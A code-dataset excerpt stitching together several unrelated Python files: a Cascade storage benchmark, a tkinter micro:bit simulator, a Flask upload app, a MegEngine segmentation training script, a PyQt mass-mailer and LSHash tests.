        self.future_queue_cv = threading.Condition(self.future_queue_mutex)
        self.client = cascade_py.ServiceClientAPI()
        self.poll_thread = threading.Thread(target=self.poll_results)
        self.send_tss = [0 for _ in range(0, _num_messages)]
        self.recv_tss = [0 for _ in range(0, _num_messages)]

    def poll_results(self):
        """Polling-thread body: wait for queued futures, record receive
        timestamps and release tx slots until every message is accounted for."""
        future_counter = 0
        while future_counter != self.num_messages:
            my_future_queue = []
            with self.future_queue_mutex:
                while len(self.future_queue) == 0:
                    try:
                        self.future_queue_cv.wait()
                    except:
                        print("Oh No!")
                # Swap the shared queue for a private one so the lock is not
                # held while the futures are being resolved.
                my_future_queue, self.future_queue = self.future_queue, my_future_queue
            for qr in my_future_queue:
                store = qr.get_result()
                self.recv_tss[future_counter] = time.time() * (10**6)
                future_counter += 1
                if self.max_pending_ops > 0:
                    # One more send may proceed now that this op completed.
                    with self.idle_tx_slot_mutex:
                        self.idle_tx_slot_cnt.inc()
                        self.idle_tx_slot_cv.notifyAll()
                if future_counter == self.num_messages:
                    break

    def wait_poll_all(self):
        """Block until the polling thread has drained every future.

        Fix: the original definition was missing ``self`` and raised
        TypeError when invoked on an instance.
        """
        self.poll_thread.join()

    def do_send(self, msg_cnt, typ, key, val):
        """Issue one put(); throttle on the tx-slot semaphore and hand the
        returned future to the polling thread."""
        # wait for a tx slot (only when throttling is enabled)
        if self.max_pending_ops > 0:
            with self.idle_tx_slot_mutex:
                while self.idle_tx_slot_cnt.value <= 0:
                    try:
                        self.idle_tx_slot_cv.wait()
                    except:
                        print("Oh No but here")
                self.idle_tx_slot_cnt.dec()
        # record the send time
        self.send_tss[msg_cnt] = time.time() * (10**6)
        qr = self.client.put(typ, key, val, 0, 0)
        with self.future_queue_mutex:
            self.future_queue.append(qr)
            self.future_queue_cv.notifyAll()

    def print_statistics(self):
        """Print per-message latencies, then throughput and latency summary."""
        for i in range(0, self.num_messages):
            print(self.send_tss[i], self.recv_tss[i], (self.recv_tss[i] - self.send_tss[i]))
        total_bytes = self.num_messages * self.message_size
        timespan_us = self.recv_tss[self.num_messages - 1] - self.send_tss[0]
        thp_MBps = total_bytes * 1000000.0 / 1048576 / timespan_us
        thp_ops = self.num_messages * 1000000.0 / timespan_us
        s = 0.0
        for i in range(0, self.num_messages):
            s += self.recv_tss[i] - self.send_tss[i]
        avg_latency_us = s / self.num_messages
        ssum = 0.0
        for i in range(0, self.num_messages):
            ssum += (self.recv_tss[i] - self.send_tss[i] - avg_latency_us) * (self.recv_tss[i] - self.send_tss[i] - avg_latency_us)
        # NOTE(review): dividing by (n + 1) is neither the population (n) nor
        # the sample (n - 1) variance estimator — kept as-is to preserve the
        # reported numbers, but worth confirming the intent.
        std_latency_us = math.sqrt(ssum / (self.num_messages + 1))
        print("Message size (KiB):", self.message_size / 1024.0)
        print("Throughput (MiB/s):", thp_MBps)
        print("Throughput (Ops/s):", thp_ops)
        print("Average-Latency (us):", avg_latency_us)
        print("Latency-std (us):", std_latency_us)
def randomize_key(i):
    """Scramble index *i* with a microsecond-time seed using xorshift-style
    mixing, so object keys are spread pseudo-randomly.

    NOTE(review): Python ints are unbounded, so the left shifts grow the
    value instead of wrapping as a true 64-bit xorshift would — harmless for
    the callers here, which reduce the result modulo a small constant, but
    worth confirming if reused elsewhere.
    """
    random_seed = int(time.time() * (10**6))
    x = i ^ random_seed
    x ^= x << 13
    x ^= x >> 7
    x ^= x << 17
    return x
def main():
    """Parse the CLI and run the put-latency/throughput benchmark.

    Fixes vs. the original:
    * exits after printing the usage message (it previously fell through and
      crashed with IndexError on sys.argv);
    * the persistent and volatile paths are unified — they differed only in
      the subgroup type tag, the banner text and a stray per-message debug
      print (removed for consistency with the persistent path, where it was
      commented out);
    * the bare ``except`` around join() is narrowed to ``Exception``.
    """
    if len(sys.argv[1:]) < 4:
        print("USAGE: python3 perf_test.py <test_type> <num_messages> <is_persistent> <msg_size> [max_pending_ops]")
        print()
        print("max_pending_ops is the maximum number of pending operations allowed. Default is unlimited.")
        sys.exit(1)

    max_distinct_objects = 4096
    typ = sys.argv[1]
    num_messages = int(sys.argv[2])
    is_persistent = int(sys.argv[3])
    message_size = int(sys.argv[4])
    max_pending_ops = -1
    if len(sys.argv[1:]) >= 5:
        max_pending_ops = int(sys.argv[5])
    if typ != "put":
        print("Sorry not support method")
        sys.exit()

    if is_persistent > 0:
        print("starting persistant")
        subgroup_type = "PCSU"
        fail_msg = "Persistant Thread Fail"
    else:
        print("starting volatile")
        subgroup_type = "VCSU"
        fail_msg = "Volatile Thread Fail"

    client = client_states(max_pending_ops, num_messages, message_size)
    payload = bytes(message_size)
    # Start the polling thread before any send so futures are consumed.
    client.poll_thread.start()
    for i in range(0, num_messages):
        key = str(randomize_key(i) % max_distinct_objects)
        client.do_send(i, subgroup_type, key, payload)
    try:
        client.poll_thread.join()
    except Exception:
        print(fail_msg)
    client.print_statistics()
    print("Done with Performance test")
def main2():
    """Run main() under cProfile and print the collected statistics.

    Fixes vs. the original: the Stats object is created with ``stream=s`` so
    the report actually lands in the StringIO buffer (previously
    ``s.getvalue()`` was always empty and the report went to stdout), and the
    profiler is disabled before the report is formatted.
    """
    pr = cProfile.Profile()
    pr.enable()
    main()
    pr.disable()  # stop profiling before formatting the report
    s = io.StringIO()
    ps = pstats.Stats(pr, stream=s)
    ps.print_stats()
    print(s.getvalue())
if __name__ == '__main__':
main()
| 2.34375 | 2 |
snippets/microbit/microbit/__init__.py | owainkenwayucl/Garbage | 0 | 12761022 |
import tkinter as tk
import time
# Routine for non-implemented features.
def NOTIMPLEMENTED():
    """Print a placeholder message for simulator features that are not implemented."""
    print(">>> Not implemented <<<")
# Simulate the face buttons.
class MicrobitButton(tk.Button):
    """Simulated micro:bit face button backed by a Tk button widget.

    Mirrors the micro:bit button API: is_pressed() while held, and
    get_presses() for the number of completed press/release cycles.
    """

    def setup(self):
        """Initialise press tracking and wire up the mouse events."""
        self.presses = 0
        self.state = False
        self.bind("<Button-1>", self.bpress)
        self.bind("<ButtonRelease-1>", self.bunpress)

    def get_presses(self):
        """Return how many completed presses have been counted."""
        return self.presses

    def is_pressed(self):
        """Return True while the button is currently held down."""
        return self.state

    def bpress(self, event):
        """Mouse-down handler: mark the button as held."""
        self.state = True

    def bunpress(self, event):
        """Mouse-up handler: release the button and count one press."""
        self.state = False
        self.increment()

    def increment(self):
        """Bump the completed-press counter by one."""
        self.presses += 1
class Image:
    """A 5x5 LED bitmap, addressed as data[column][row]."""

    def __init__(self, image_data=None):
        """Build the bitmap.

        *image_data* may be None (all LEDs off), a ``'rrrrr:rrrrr:...'``
        string of five colon-separated rows, or a 5x5 nested sequence of
        rows.  A single character would select a built-in image, which is
        not implemented yet.

        Fix: the original class defined ``__init__`` twice; the first
        (zero-argument) definition was dead code shadowed by the second, so
        ``Image()`` raised TypeError.  Merging them restores the no-argument
        constructor without changing the other call forms.
        """
        # Copy each row so the five rows don't alias one list.
        self.data = [x[:] for x in [[0] * 5] * 5]
        if image_data is None:
            return
        if isinstance(image_data, str):
            if len(image_data) == 1:
                NOTIMPLEMENTED()
            else:
                rows = image_data.split(":")
                for j in range(5):
                    for i in range(5):
                        # Transpose: data is column-major, the input row-major.
                        self.data[i][j] = int(rows[j][i])
        else:
            for j in range(5):
                for i in range(5):
                    self.data[i][j] = int(image_data[j][i])
class ledpack:
    """Simulated 5x5 LED matrix rendered on a Tk canvas."""
    def __init__(self, canvas, context):
        # context is the Tk root window, used to pump the event loop on redraw
        self.context = context
        # 5x5 brightness grid; rows copied so they don't alias one list
        self.leds = [x[:] for x in [[0] * 5] * 5]
        self.canvas = canvas
        self.draw_leds()
        self.turnedon=True
    def draw_leds(self):
        """Repaint the matrix: black background, then one red 40x40 square
        per lit LED with intensity hex((value * 32) - 1).
        NOTE(review): assumes brightness values in 0..8 (8 -> 0xff); larger
        values would produce a malformed color string — confirm the intended
        range.  The on/off flag is not consulted here either.
        """
        self.canvas.create_rectangle(0,0,200,200,fill='black')
        for i in range(5):
            for j in range(5):
                if self.leds[i][j] >= 1:
                    shade = hex(int((self.leds[i][j] * 32) - 1))[2:]
                    if len(shade) == 1:
                        # pad to two hex digits for the #RRGGBB string
                        shade = "0" + shade
                    shade = "#" + shade + "0000"
                    self.canvas.create_rectangle(i*40,j*40,(i+1)*40,(j+1)*40,fill=shade)
        self.canvas.update_idletasks()
        self.context.update()
    def set_pixel(self, x, y, value):
        """Set one LED's brightness and repaint the matrix."""
        self.leds[x][y] = value
        self.draw_leds()
    def get_pixel(self, x, y):
        """Return the brightness of one LED."""
        return self.leds[x][y]
    def clear(self):
        """Turn every LED off and repaint."""
        self.leds = [x[:] for x in [[0] * 5] * 5]
        self.draw_leds()
    def on(self):
        # NOTE(review): draw_leds ignores this flag, so on()/off() have no
        # visible effect — presumably off() should blank the display; confirm.
        self.turnedon = True
    def off(self):
        self.turnedon = False
    def is_on(self):
        return self.turnedon
    def read_light_level(self):
        """Ambient light sensing is not simulated; always returns 0."""
        NOTIMPLEMENTED()
        return 0
    def scroll(self, value, delay=400, wait=True, loop=False, monospace=False):
        """Scrolling text is not simulated."""
        NOTIMPLEMENTED()
    def show(self, image):
        """Copy an Image's 5x5 bitmap onto the LEDs and repaint."""
        for i in range(5):
            for j in range(5):
                self.leds[i][j] = image.data[i][j]
        self.draw_leds()
# Set up stuff when imported: create the simulator window, the two face
# buttons and the LED display as module-level singletons, mirroring the
# micro:bit API (button_a, button_b, display).
_mb_win = tk.Tk()
_mb_win.title("Macro:Bit")
button_a = MicrobitButton(_mb_win, text="A")
button_b = MicrobitButton(_mb_win, text="B")
button_a.setup()
button_b.setup()
button_a.pack(side=tk.LEFT)
button_b.pack(side=tk.RIGHT)
_mb_can = tk.Canvas(_mb_win, width=200, height=200)
# display owns the canvas; ledpack.draw_leds() pumps the Tk event loop
display = ledpack(_mb_can, _mb_win)
_mb_can.pack(expand=tk.YES, fill=tk.BOTH)
codes/tests/test_rotation.py | k1101jh/Alpha-Zero | 1 | 12761023 | import numpy as np
def test_rotation():
    """Visual check of dihedral data augmentation: print all four rotations
    and their horizontal mirrors for two sample boards, alongside the
    correspondingly transformed visit-count grids.

    Fixes vs. the original: the inner print loops reused ``i``, shadowing the
    outer enumerate index, and hard-coded ``3`` where ``board_size`` was
    already defined.  The printed output is unchanged.
    """
    board_size = 3
    states = np.array([[[[1, 2, 0],
                         [2, 1, 0],
                         [0, 1, 2]]],
                       [[[0, 3, 4],
                         [0, 0, 0],
                         [2, 1, 0]]]])
    visit_counts = np.array([[0, 0, 3,
                              0, 0, 2,
                              1, 0, 0],
                             [5, 0, 0,
                              6, 7, 8,
                              0, 0, 9]])

    new_states = []
    new_visit_counts = []
    for state, visit_count in zip(states, visit_counts):
        grid = visit_count.reshape(board_size, board_size)
        for k in range(4):
            rotated_state = np.rot90(state, k, axes=(1, 2))
            rotated_grid = np.rot90(grid, k, axes=(0, 1))
            new_states.append(rotated_state)
            new_visit_counts.append(rotated_grid)
            # mirror of each rotation: flip along the column axis
            new_states.append(np.flip(rotated_state, 2))
            new_visit_counts.append(np.fliplr(rotated_grid))

    for case, (state, visit_count) in enumerate(zip(new_states, new_visit_counts)):
        print("case: ", case)
        for row in range(board_size):
            for col in range(board_size):
                print(state[0][row][col], end=' ')
            print('')
        print('')
        for row in range(board_size):
            for col in range(board_size):
                print(visit_count[row][col], end=' ')
            print('')
        print('')


if __name__ == "__main__":
    test_rotation()
| 3.109375 | 3 |
main.py | MSD200X/Automated_music_Transcription | 84 | 12761024 | <reponame>MSD200X/Automated_music_Transcription
from flask import Flask
from flask import request
from flask import redirect, url_for, render_template
from werkzeug import secure_filename
import os
import string
import random
app = Flask(__name__)
app.config.from_object(__name__)
UPLOAD_FOLDER = '/tmp/music_files'
ALLOWED_EXTENSIONS = set(['wav'])
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
def generate_random_name(extension, length=8):
    """Return a random uppercase-alphanumeric file name with *extension*.

    Args:
        extension: file extension to append (without the dot).
        length: number of random characters in the stem (default 8,
            matching the original behavior).

    Uses random.SystemRandom (OS entropy) so names are unpredictable.
    """
    alphabet = string.ascii_uppercase + string.digits
    rng = random.SystemRandom()
    stem = ''.join(rng.choice(alphabet) for _ in range(length))
    return stem + '.' + extension
def allowed_file(filename):
    """Return True when *filename* carries an extension listed in
    ALLOWED_EXTENSIONS."""
    if '.' not in filename:
        return False
    extension = filename.rsplit('.', 1)[1]
    return extension in ALLOWED_EXTENSIONS
@app.route('/', methods=['GET', 'POST'])
def main():
    """Landing page.

    On POST with an allowed .wav upload: save it under a random name and
    render the page with that name (extension stripped).  On GET, or when
    the upload is missing/disallowed, just render the page.
    """
    if request.method != 'POST':
        return render_template('main.html')
    file = request.files['file']
    if not (file and allowed_file(file.filename)):
        return render_template('main.html')
    # filename = secure_filename(file.filename)
    filename = generate_random_name('wav')
    file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
    return render_template('main.html', filename=filename[:-4])
@app.route('/<filename>')
def display_sheet_notes(filename):
    """Render the transcription result page for the given (extension-less)
    upload name."""
    return render_template('display_sheet_notes.html',
                           filename=filename)
if __name__ == "__main__":
    # Development server only; use a proper WSGI server in production.
    app.run(host='localhost', port=9090, debug=True)
| 2.734375 | 3 |
official/vision/segmentation/tools/train.py | pepperonibo/Models | 294 | 12761025 | <reponame>pepperonibo/Models
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import argparse
import os
import time
import numpy as np
import megengine as mge
import megengine.distributed as dist
import megengine.functional as F
from megengine.autodiff import GradManager
from megengine.data import DataLoader, Infinite, RandomSampler, dataset
from megengine.data import transform as T
from megengine.optimizer import SGD
from official.vision.segmentation.tools.utils import AverageMeter, get_config_info, import_from_file
logger = mge.get_logger(__name__)
logger.setLevel("INFO")
mge.device.set_prealloc_config(1024, 1024, 256 * 1024 * 1024, 4.0)
def main():
    """CLI entry point: parse arguments, create the log directory and launch
    the training worker on one GPU or through the distributed launcher."""
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-f", "--file", default="net.py", type=str, help="net description file"
    )
    # Fix: the help text previously said "batch size for training", which was
    # copy-pasted — this flag is the number of devices (GPUs).
    parser.add_argument(
        "-n", "--devices", type=int, default=8, help="number of devices (GPUs) to train with"
    )
    parser.add_argument(
        "-d", "--dataset_dir", type=str, default="/data/datasets",
    )
    parser.add_argument(
        "-r", "--resume", type=str, default=None, help="resume model file"
    )
    args = parser.parse_args()

    # ------------------------ begin training -------------------------- #
    logger.info("Device Count = %d", args.devices)

    log_dir = "log-of-{}".format(os.path.basename(args.file).split(".")[0])
    if not os.path.isdir(log_dir):
        os.makedirs(log_dir)

    if args.devices > 1:
        # Spawn one worker process per GPU via MegEngine's launcher.
        trainer = dist.launcher(worker, n_gpus=args.devices)
        trainer(args)
    else:
        worker(args)
# pylint: disable=too-many-branches
def worker(args):
    """Per-process training worker.

    Builds the model and optimizer, attaches gradient all-reduce when
    running distributed, optionally resumes from a checkpoint, then trains
    epoch by epoch with rank 0 writing checkpoints.
    """
    current_network = import_from_file(args.file)
    model = current_network.Net(current_network.Cfg())
    model.train()
    if dist.get_rank() == 0:
        logger.info(get_config_info(model.cfg))
        logger.info(repr(model))
    # Split parameters: backbone gets a 10x smaller learning rate than the
    # head (see the two param groups below and adjust_learning_rate()).
    backbone_params = []
    head_params = []
    for name, param in model.named_parameters():
        if "backbone" in name:
            backbone_params.append(param)
        else:
            head_params.append(param)
    # Base LR is scaled linearly with the number of workers.
    opt = SGD(
        [
            {
                "params": backbone_params,
                "lr": model.cfg.learning_rate * dist.get_world_size() * 0.1,
            },
            {"params": head_params},
        ],
        lr=model.cfg.learning_rate * dist.get_world_size(),
        momentum=model.cfg.momentum,
        weight_decay=model.cfg.weight_decay,
    )
    gm = GradManager()
    if dist.get_world_size() > 1:
        # Average gradients across workers during backward.
        gm.attach(
            model.parameters(),
            callbacks=[dist.make_allreduce_cb("mean", dist.WORLD)]
        )
    else:
        gm.attach(model.parameters())
    cur_epoch = 0
    if args.resume is not None:
        pretrained = mge.load(args.resume)
        cur_epoch = pretrained["epoch"] + 1
        model.load_state_dict(pretrained["state_dict"])
        opt.load_state_dict(pretrained["opt"])
        if dist.get_rank() == 0:
            logger.info("load success: epoch %d", cur_epoch)
    if dist.get_world_size() > 1:
        dist.bcast_list_(model.parameters()) # sync parameters
        dist.bcast_list_(model.buffers()) # sync buffers
    if dist.get_rank() == 0:
        logger.info("Prepare dataset")
    train_loader = iter(
        build_dataloader(model.cfg.batch_size, args.dataset_dir, model.cfg)
    )
    for epoch in range(cur_epoch, model.cfg.max_epoch):
        train_one_epoch(model, train_loader, opt, gm, epoch)
        if dist.get_rank() == 0:
            # Only rank 0 writes the per-epoch checkpoint.
            save_path = "log-of-{}/epoch_{}.pkl".format(
                os.path.basename(args.file).split(".")[0], epoch
            )
            mge.save({
                "epoch": epoch,
                "state_dict": model.state_dict(),
                "opt": opt.state_dict()
            }, save_path)
            logger.info("dump weights to %s", save_path)
logger.info("dump weights to %s", save_path)
def train_one_epoch(model, data_queue, opt, gm, epoch):
    """Run one epoch: per-step LR schedule, forward/backward/step, and
    rank-0 logging of loss and timing every cfg.log_interval steps."""
    def train_func(data, label):
        # Forward and backward run inside the GradManager scope; the
        # optimizer step/clear happens outside it.
        with gm:
            pred = model(data)
            loss = cross_entropy(
                pred, label, ignore_label=model.cfg.ignore_label
            )
            gm.backward(loss)
        opt.step().clear_grad()
        return loss
    meter = AverageMeter(record_len=1)
    time_meter = AverageMeter(record_len=2)
    log_interval = model.cfg.log_interval
    # Steps per epoch, derived from the global (all-worker) batch size.
    tot_step = model.cfg.nr_images_epoch // (
        model.cfg.batch_size * dist.get_world_size()
    )
    for step in range(tot_step):
        adjust_learning_rate(opt, epoch, step, tot_step, model.cfg)
        data_tik = time.time()
        inputs, labels = next(data_queue)
        # Drop the singleton mask-channel axis and cast labels for the loss.
        labels = np.squeeze(labels, axis=1).astype(np.int32)
        data_tok = time.time()
        tik = time.time()
        loss = train_func(mge.tensor(inputs), mge.tensor(labels))
        tok = time.time()
        time_meter.update([tok - tik, data_tok - data_tik])
        if dist.get_rank() == 0:
            info_str = "e%d, %d/%d, lr:%f, "
            loss_str = ", ".join(["{}:%f".format(loss) for loss in ["loss"]])
            time_str = ", train_time:%.3fs, data_time:%.3fs"
            log_info_str = info_str + loss_str + time_str
            meter.update([loss.numpy() for loss in [loss]])
            if step % log_interval == 0:
                logger.info(
                    log_info_str,
                    epoch,
                    step,
                    tot_step,
                    opt.param_groups[1]["lr"],
                    *meter.average(),
                    *time_meter.average()
                )
                meter.reset()
                time_meter.reset()
def adjust_learning_rate(optimizer, epoch, step, tot_step, cfg):
    """Polynomial (power 0.9) learning-rate decay over the whole run.

    The second param group (head) gets the full rate; the first group
    (backbone) gets one tenth of it, matching how the groups were built.
    """
    total_iters = cfg.max_epoch * tot_step
    current_iter = epoch * tot_step + step
    lr = cfg.learning_rate * (1 - current_iter / (total_iters + 1)) ** 0.9
    optimizer.param_groups[0]["lr"] = lr * 0.1  # backbone
    optimizer.param_groups[1]["lr"] = lr  # head
def cross_entropy(pred, label, axis=1, ignore_label=255):
    """Per-pixel cross entropy that skips positions labelled *ignore_label*.

    Assumes pred is NCHW (transpose(0, 2, 3, 1) moves channels last) so the
    boolean mask over labels selects per-pixel logit vectors — TODO confirm
    the layout against the model's output.
    """
    mask = label != ignore_label
    pred = pred.transpose(0, 2, 3, 1)
    return F.loss.cross_entropy(pred[mask], label[mask], axis)
def build_dataloader(batch_size, dataset_dir, cfg):
    """Build an infinite, randomly-sampled training DataLoader.

    Supports the VOC2012 and Cityscapes datasets (selected via cfg.dataset)
    and applies flip/resize/crop/normalize augmentation to image and mask
    jointly.  Raises ValueError for any other dataset name.
    """
    if cfg.dataset == "VOC2012":
        train_dataset = dataset.PascalVOC(
            dataset_dir,
            cfg.data_type,
            order=["image", "mask"]
        )
    elif cfg.dataset == "Cityscapes":
        train_dataset = dataset.Cityscapes(
            dataset_dir,
            "train",
            mode='gtFine',
            order=["image", "mask"]
        )
    else:
        raise ValueError("Unsupported dataset {}".format(cfg.dataset))
    # Infinite sampler: the training loop pulls a fixed number of steps per
    # epoch instead of exhausting the loader.
    train_sampler = Infinite(RandomSampler(train_dataset, batch_size, drop_last=True))
    train_dataloader = DataLoader(
        train_dataset,
        sampler=train_sampler,
        transform=T.Compose(
            transforms=[
                T.RandomHorizontalFlip(0.5),
                T.RandomResize(scale_range=(0.5, 2)),
                T.RandomCrop(
                    output_size=(cfg.img_height, cfg.img_width),
                    padding_value=[0, 0, 0],
                    # pad masks with the ignore label so padded pixels are
                    # excluded from the loss
                    padding_maskvalue=255,
                ),
                T.Normalize(mean=cfg.img_mean, std=cfg.img_std),
                T.ToMode(),
            ],
            order=["image", "mask"],
        ),
        num_workers=2,
    )
    return train_dataloader
if __name__ == "__main__":
main()
| 1.945313 | 2 |
src/Comunication/View/MailView.py | begbaj/progetto-ing-sw | 0 | 12761026 | <reponame>begbaj/progetto-ing-sw
import time
from email.header import Header
from email.mime.multipart import MIMEMultipart
from PyQt5.QtWidgets import QWidget
from PyQt5.uic import loadUi
from src.Comunication.Controllers.ComunicationManager import ComunicationManager
import smtplib
from email.mime.text import MIMEText
from src.Users.controllers.UserManager import UserManager
from src.Utils.UI import Popup
class MailView(QWidget):
    """Qt widget for composing e-mails (free-form or from stored templates)
    and sending them to one registered user or to all of them via Gmail SMTP.

    Fixes vs. the original:
    * ``sendEmail(i)`` now greets recipient ``i`` — it previously used the
      user currently selected in the combo box, which was wrong whenever
      "send to all" was checked;
    * boolean widget checks use ``if x.isChecked():`` instead of ``== True``
      and locals no longer shadow the ``str``/``sum`` builtins;
    * the HTML footer file is read with a context manager (no fd leak) and
      progress values are passed to ``setValue`` as ints.
    """
    # Managers
    comunicationM = ComunicationManager()
    userM = UserManager()
    # E-mail state (credentials are filled in by setup_email)
    sender_email = ''
    rec_email = ''
    password = ''
    server = ''
    msg = ''

    def __init__(self, widget):
        super(MailView, self).__init__()
        loadUi("../designer/Comunications/MailView.ui", self)
        # State
        self.widget = widget
        self.comunications = self.comunicationM.list()
        self.users = ''
        self.comunication = ''
        self.pop = ''
        self.com_sub_list = ''
        self.users_combo = []
        self.com_rec_list = []
        # Initial wiring
        self.setup()

    # Region Set-Up
    def setup(self):
        """Initialise credentials and UI components."""
        self.setup_email()
        self.setup_component()

    def setup_component(self):
        """Wire the buttons, set field defaults and populate the combos."""
        # Buttons
        self.sendButton.clicked.connect(self.send)
        self.refreshtextButton.clicked.connect(self.refresh_text)
        self.backButton.clicked.connect(self.close)
        # Field properties
        self.refreshtextButton.hide()
        self.mailField.setText(self.sender_email)
        self.mailField.setReadOnly(True)
        self.objectMail.setReadOnly(True)
        # Combo boxes
        self.set_combo_box()
        # Progress bar
        self.progressBar.setVisible(False)

    def set_combo_box(self):
        """Fill the template combo and the recipient combo (only users with
        a registered e-mail address) and hook their change signals."""
        # Predefined message templates
        self.com_sub_list = []
        self.com_sub_list.append('')
        for com in self.comunications:
            self.com_sub_list.append(com.subject)
        self.messageBox.addItems(self.com_sub_list)
        # Swap subject/body when a different template is chosen
        self.messageBox.currentTextChanged.connect(self.on_message_box_changed)
        # Users that registered an e-mail address
        self.users = self.userM.list()
        self.users_combo = []
        self.com_rec_list = []
        self.com_rec_list.append('')
        for user in self.users:
            if user.email != '':
                self.com_rec_list.append(user.name + " " + user.surname)
                self.users_combo.append(user)
        self.recipientBox.addItems(self.com_rec_list)
        # Track the recipient address when the selection changes
        self.recipientBox.currentTextChanged.connect(self.on_recipient_box_changed)
        self.allBox.stateChanged.connect(self.state_changed)

    def setup_email(self):
        """Set the Gmail credentials used as the sender.

        SECURITY NOTE(review): credentials are hard-coded placeholders; they
        should come from configuration or a secret store instead.
        """
        self.sender_email = "<EMAIL>"  # Enter your address
        self.password = "<PASSWORD>"
    # endregion

    # Region UI callbacks
    def on_message_box_changed(self):
        """Load the selected template into the subject/body fields, or clear
        and unlock them when the empty entry is selected."""
        if self.messageBox.currentText() == '':
            self.objectMail.setPlainText('')
            self.textMail.setPlainText('')
            self.refreshtextButton.hide()
            self.objectMail.setReadOnly(False)
        else:
            self.objectMail.setPlainText(self.comunicationM.find(self.messageBox.currentIndex()).subject)
            self.textMail.setPlainText(self.comunicationM.find(self.messageBox.currentIndex()).text)
            self.refreshtextButton.show()
            self.objectMail.setReadOnly(True)

    def on_recipient_box_changed(self):
        """Track the e-mail address of the currently selected user."""
        self.rec_email = self.users_combo[self.recipientBox.currentIndex() - 1].email

    def send(self):
        """Send the composed message to every user (if "all" is checked) or
        to the selected one, updating the progress bar and confirming with a
        popup."""
        progress = 100 / len(self.users_combo)
        self.progressBar.setVisible(True)
        done = 0
        if self.allBox.isChecked():
            for i in range(0, len(self.users_combo)):
                done = done + progress
                self.progressBar.setValue(int(done))  # setValue() takes an int
                self.sendEmail(i)
            self.progressBar.setVisible(False)
            message = "Email inviate con successo!"
        else:
            self.sendEmail(self.recipientBox.currentIndex() - 1)
            message = "Email inviata con successo!"
        self.pop = Popup(message)
        self.pop.show()
        print("Email has been sent to ", self.msg)

    def state_changed(self):
        """The single-recipient combo is enabled only while "all" is unchecked."""
        self.recipientBox.setEnabled(not self.allBox.isChecked())

    def sendEmail(self, i):
        """Compose and send one e-mail to ``users_combo[i]`` via Gmail SMTP."""
        # Recipient address
        self.rec_email = f"{self.users_combo[i].email}"
        # Message content
        self.msg = MIMEMultipart()
        self.msg['Subject'] = Header(self.objectMail.toPlainText()).encode()
        self.msg['To'] = self.rec_email
        # Fix: greet recipient i (previously used the combo-box selection,
        # which was wrong when sending to all users).
        self.txt = MIMEText('Gentile ' + self.users_combo[i].name + ',\n'
                            + self.textMail.toPlainText())
        self.msg.attach(self.txt)
        with open('config/end_mail.html') as footer:
            email_end = footer.read()
        end = MIMEText(email_end, 'html')
        self.msg.attach(end)
        # Connect and authenticate with the SMTP server
        self.server = smtplib.SMTP('smtp.gmail.com', 587)
        self.server.starttls()
        self.server.login(self.sender_email, self.password)
        print("Login success")
        # Forward the e-mail
        self.server.sendmail(self.sender_email, self.rec_email, self.msg.as_string())

    def refresh_text(self):
        """Persist the edited template text and confirm with a popup.

        NOTE(review): ``self.comunication`` is only ever initialised to ''
        in the visible code — confirm where the selected template object is
        assigned before relying on this path.
        """
        self.comunication.text = self.textMail.toPlainText()
        self.comunicationM.set(self.comunication)
        self.pop = Popup("Email predefinita aggiornata!")
        self.pop.show()
    # endregion
| 2.25 | 2 |
tests/test_lsh.py | simonemainardi/LSHash | 61 | 12761027 | <gh_stars>10-100
import random
import string
from unittest import TestCase
from redis import StrictRedis
from pprint import pprint
import sys
import os
# add the LSHash package to the current python path
sys.path.insert(0, os.path.abspath('../'))
# now we can use our lshash package and not the standard one
from lshash import LSHash
class TestLSHash(TestCase):
    """Integration tests for LSHash with the in-memory and Redis backends.

    The Redis tests require a local server on the default port and use
    (and flush) database 15.
    """
    # number of random 8-dimensional vectors indexed per test
    num_elements = 100
    def setUp(self):
        """Generate random integer vectors plus a random 10-char name each."""
        self.els = []
        self.el_names = []
        for i in range(self.num_elements):
            el = [random.randint(0, 100) for _ in range(8)]
            elname = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
            self.els.append(tuple(el))
            self.el_names.append(elname)
    def test_lshash(self):
        """Index every vector twice in memory; duplicates must be stored once
        and each vector must query back to itself at distance 0."""
        lsh = LSHash(6, 8, 1)
        for i in range(self.num_elements):
            lsh.index(list(self.els[i]))
            lsh.index(list(self.els[i])) # multiple insertions
        hasht = lsh.hash_tables[0]
        itms = [hasht.get_list(k) for k in hasht.keys()]
        for itm in itms:
            assert itms.count(itm) == 1
            for el in itm:
                assert el in self.els
        for el in self.els:
            res = lsh.query(list(el), num_results=1, distance_func='euclidean')[0]
            # res is a tuple containing the vector and the distance
            el_v, el_dist = res
            assert el_v in self.els
            assert el_dist == 0
        del lsh
    def test_lshash_extra_val(self):
        """Same as test_lshash, but each vector carries its name as extra data."""
        lsh = LSHash(6, 8, 1)
        for i in range(self.num_elements):
            lsh.index(list(self.els[i]), self.el_names[i])
        hasht = lsh.hash_tables[0]
        itms = [hasht.get_list(k) for k in hasht.keys()]
        for itm in itms:
            for el in itm:
                assert el[0] in self.els
                assert el[1] in self.el_names
        for el in self.els:
            # res is a list, so we need to select the first entry only
            res = lsh.query(list(el), num_results=1, distance_func='euclidean')[0]
            # vector and name are in the first element of the tuple res[0]
            el_v, el_name = res[0]
            # the distance is in the second element of the tuple
            el_dist = res[1]
            assert el_v in self.els
            assert el_name in self.el_names
            assert el_dist == 0
        del lsh
    def test_lshash_redis(self):
        """Redis-backed variant: duplicate insertions must be prevented by
        the library, and every vector must query back at distance 0.
        """
        config = {"redis": {"host": 'localhost', "port": 6379, "db": 15}}
        sr = StrictRedis(**config['redis'])
        sr.flushdb()
        lsh = LSHash(6, 8, 1, config)
        for i in range(self.num_elements):
            lsh.index(list(self.els[i]))
            lsh.index(list(self.els[i])) # multiple insertions should be prevented by the library
        hasht = lsh.hash_tables[0]
        itms = [hasht.get_list(k) for k in hasht.keys()]
        for itm in itms:
            for el in itm:
                assert itms.count(itm) == 1 # have multiple insertions been prevented?
                assert el in self.els
        for el in self.els:
            res = lsh.query(list(el), num_results=1, distance_func='euclidean')[0]
            el_v, el_dist = res
            assert el_v in self.els
            assert el_dist == 0
        del lsh
        sr.flushdb()
